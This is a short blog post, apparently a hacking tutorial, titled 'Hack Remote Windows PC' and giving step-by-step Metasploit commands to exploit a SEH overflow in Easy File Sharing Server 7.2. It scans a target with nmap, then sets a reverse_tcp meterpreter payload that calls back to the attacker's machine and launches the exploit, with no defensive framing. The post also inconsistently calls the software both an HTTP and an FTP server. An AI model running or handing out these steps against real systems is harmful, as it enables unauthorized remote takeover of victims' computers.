Hack Remote Windows PC using Easy File Sharing HTTP Server 7.2 SEH Overflow

This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software

Exploit Targets
Easy File Sharing FTP Server 7.2

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Most Easy File Sharing FTP Server run on port 80 or 8080 so in order to discover information regarding the Easy File Sharing FTP Server we need to execute the following script:


Nmap  -sV 192.168.0.103


Open Kali terminal type msfconsole


Now type use exploit/windows/http/easyfilesharing_seh
msf exploit (easyfilesharing_seh)>set payload windows/meterpreter/reverse_tcp
msf exploit (easyfilesharing_seh)>set lhost 192.168.0.119 (IP of Local Host)
msf exploit (easyfilesharing_seh)>set rhost 192.168.0.103
msf exploit (easyfilesharing_seh)>set rport 8080
msf exploit (easyfilesharing_seh)>exploit  


0 comments:

Post a Comment